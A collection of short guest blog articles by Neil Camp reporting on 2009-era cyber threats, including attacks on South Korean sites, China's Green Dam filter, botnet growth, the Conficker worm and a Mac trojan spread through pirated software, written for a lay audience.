South Korea is coming under repeated attack from hackers and malicious viruses and is, unsurprisingly, pointing the finger at its northern neighbour.

Yet research into the attacks, which affected computers in the U.S. as well as South Korea and centre on web site outages (a server is deliberately swamped as people are directed by a virus into one site at the same time), show that the five IP addressees used to deliver the virus did not originate from North Korea. Rather, they were based ironically in South Korea itself and the U.S, as well as Austria, Georgia and Germany.

South Korea and US officials quickly blocked the five sites, although it is believed that they were being controlled remotely from outside of the five countries. In effect, the creator of the virus was using zombie computers (those unknowingly controlled by a third party), to launch the attack. And the trail from the zombie computers could lead back to North Korea, say US experts.

But the five rogue IP addresses are the tip of the iceberg. South Korea has blocked a further 86 rogue addressees based in 16 countries. This is indeed worrying, but the actual damage caused has been minimal.

The attacks have been linked to other concerted attempts to crash and disrupt other major websites, including the Nasdaq Stock Exchange, the Pentagon, South Korea’s presidential Blue House and the White House.

South Korea’s intelligence agencies believe that their neighbours are to blame, but admit that this is based on technical reasons, as well as circumstantial evidence.

And North Korea is an unpopular state for many reasons, not least for its stance on nuclear missile tests and launches.

Unsurprisingly, the North Koreans have stayed tight lipped over the accusations, but a number of attacks on sites in the South, both governmental and private, continue apace.

But the South Koreans remained convinced that the North was behind the attacks. They highlight the fact that the North are bitterly opposed to a planned cyber warfare exercise between the South and the US. And the South believe that the North has created a special cyber warfare unit which has the main purpose of hacking into South Korean and US military networks.

Nearby Japan takes the threat seriously and is closely monitoring the situation, although no attacks have yet been reported.

Guest Article by Neil Camp

The Chinese Governments attempts to keep their people free from internet porn and the like are facing howls of protests from computer users.

Porn of course is the excuse for the state nanny software – called Green Dam Youth Escort – to filter out all those sites that the Government does not approve of.

Many computer experts, outside of China and inside its boundaries, claim that the filter is so full of holes and flaws that it will be a gift to computer hackers.

But as from the start of July, all personal computers sold in China will have had to be pre-loaded with a copy of Green Dam Youth Escort, or have a disc that must be loaded as the computer is prepared.

One of the major problems is that the software on the PC communicates with its base servers (which hold databases of accepted and non-accepted sites) via unencrypted messages. So, potentially, these messages can be hacked and taken over by cyber criminals, who then access individual computers and steal personal information, or worse, effectively link all of China’s personal computers into a huge botnet.

A botnet is a network of zombie computers which are under the stealth control of an external, malicious hacker. Computer security experts are white faced when thinking what that could entail in terms of spam email generation alone.

And the system has fundamental flaws. You can access porn if you use the Firefox browser, use a web proxy server, or have Linux on board instead of Windows. It also has trouble sorting out what might be animal flesh (and therefore regarded as porn) and what might be allowed: dark skin pigments are okay.

So, when travelling to China, don’t expect your full range of internet services and just be careful your machine does not become a zombie, for the sake of us all.

Guest Article by Neil Camp

McAfee’s latest security threat report (covering January to March, 2009), reveals that since January, over 12 million new IP addresses have been hi-jacked by cybercriminals, a 50% increase since 2008.

IP addresses are hijacked and their computers used as zombies within worldwide botnets. A zombie will then be used to send out spam email, infecting other machines which will in turn send out even more email, and so the process goes on, creating billions of spam emails which clog up the system.

The U.S. is home to the greatest percentage of botnet infected computers, accounting for nearly 20% of all zombie machines.

Cybercriminals are rushing to create new botnets after the shakedown of a major spam hosting ISP, McColo Corp, in November 2008 which cut spam levels by some 60%.

And the cybercriminals are quickly recovering the ground that they had lost, with spam volumes now about 70% of what they were before McColo was stopped.

Jeff Green, senior vice president of McAfee Avert Labs, said: “The massive expansion of these botnets provides cybercriminals with the infrastructure they need to flood the web with malware. Essentially, this is cybercrime enablement.”

The report came up with a number of other findings, including that the Koobface virus has made a resurgence. More than 800 new variants of the virus have been discovered in March 2009 alone.

Also, malware writers are increasingly using servers which host legitimate content to launch malicious and illegal content.

URL redirects are being used more often by cybercriminals and the use of web 2.0 sites are being used to hide their location.

Ironically, given the recent media fuss about Conficker, the report concludes that this worm, and all its variants, only accounted for some 10% of detections reported during the first quarter. But whether this means it was over-hyped, or hasn’t yet had the affect feared, remains to be seen.

Guest Article by Neil Camp

Conficker is coming alive.

The virus that threatened to cause chaos on April Fool’s Day and was eventually labelled by some as a prank, is having the last laugh as it becomes activated across a number of personal computers.

Conficker, also spelt Conflicker, and also known as Downadup, or Kido, is a particularly insidious form of worm which sits covertly on a computer and turns them into a zombie, part of a botnet. The zombie sits and awaits instructions, mostly opening the way for a piece of malware with a specific task. This might be a virus called Waledac, which sends out millions of spam emails from the computer’s mail box.

Accompanying the spam emails are false anti-spyware programmes which eventually renders the receiving computer open to attack. The receiving computer is then recruited into the botnet, in turn sending out more spam email. The receiving computer is also sitting there with its defences down, awaiting the virus to send back personal and financial details of its user back to the originator of the worm.

Computer security experts are worried because the worm appears very sophisticated and operates in a stealth mode, sitting on machines until activated. It’s feared that the Conficker has infiltrated thousands of computers, awaiting instructions. Experts also fear that there is a twist that no-one is aware of yet, as the Conficker has yet to show its true colours.

The Conficker and its botnets are thought to be controlled by cyber crime syndicates based in China, Eastern Europe, Latin America and Southeast Asia.

The worm is designed to exploit operating system weaknesses, with Windows being particularly vulnerable. It can by-pass many corporate firewalls as people swap files from one infected computer to a clean one, using a USB memory stick.

Computer users worldwide are being warned to be on their guard against the Conficker.

Guest Article by Neil Camp

Security firm Finjan has discovered a massive network of remotely controlled PCs, including computers inside the U.K. and U.S. governments.

The network, known in the industry as a botnet, is said to have spread across nearly two million individual machines and looks likely to have originated in the Ukraine. Although figures were patchy, it is believed that several computers within U.K. Government departments were comprised. It is understood that the Metropolitan Police is investigating.

A botnet is a cyber criminals dream. The infected computers that form the net become zombies, awaiting instructions from the people who planted them. All it takes is for one machine to be infected, before it then in-turn infects as many machines as it can, creating the botnet. The zombie computers are then open to attack from all kinds of viruses and malware which have different roles in life.

One job might be to send out phishing emails from the computer users mailbox, enlarging the botnet and causing people to load bogus websites which ask for personal and financial details. Another might be to record keystrokes on a user’s computer which allows the cyber criminals to enter a legimate website, usually financial, and empty an account using the information they have gathered. And they might allow access to a computer’s stored information, including files and operating systems.

In effect, the zombie computer becomes a beachhead for all manner of future attacks.

The cyber criminals behind the attack represent the storm troopers and rather than use the open door themselves, they usually sell the opportunity to others. It has been reported that the hackers behind this botnet were selling access to machines within the botnet at around $100 a time.

The botnet hit worldwide, with around 5% of infected machines being situated in the U.K., including the British Government and one computer inside the BBC.

The network was spotted after routine security checks and rumours of its existence, and marks a new stage of sophistication from the world’s cyber criminals.

Guest Article by Neil Camp

Users of Mac computers have by and large been free of the internet-born viruses, but now bot herders are going after Apple owners as well.

By the way, in case you were wondering, a bot herder is a cracker which automatically scans a network to discover a vulnerable system. A computer without a current internet patch is such a system and they exploit the hole by installing their own particular bot programme. The machine, now infected, is regarded as a zombie. A number of zombies make-up a botnet and this infiltrated network is then controlled by the bot herder. And one of the best techniques for controlling such a botnet is via an internet relay chat channel.

So, there we are, and with computers becoming increasingly popular, and the percentage of Macs in use also going up, they have now become a viable target for cyber criminals. And the Achilles heal for Mac users is pirated software.

In the frame is the well-known, peer-to-peer site BitTorrent, which Mac fans use to share large files. It’s thought by computer security experts that doing the rounds has been a number of examples of pirated Apple software, including Adobe Photoshop and iWork. The programmes might work, but the sting in the tail is that they are infected with a trojan called OSXIservice.

This trojan infiltrates the Mac by installing remote control software. Once installed, it contacts other computers within the network with the aim of destroying websites, or web servers, with a denial-of-service attack. Such an attack is a form of extortion. The trojan shuts down a website and the hackers approach the owners and demand money for the key to get it back working. Although it’s hard to get figures on how often this happens – website owners who have been affected are naturally coy when admitting they have to pay ransom demands for their own website back – the problem is getting worse.

And whereas Mac users were not of the number for the hackers to be bothered with, their recent success has ironically led to some unwanted attention.

So, Mac users, beware of pirates bearing gifts it could cost you dear in the end.

Guest Article by Neil Camp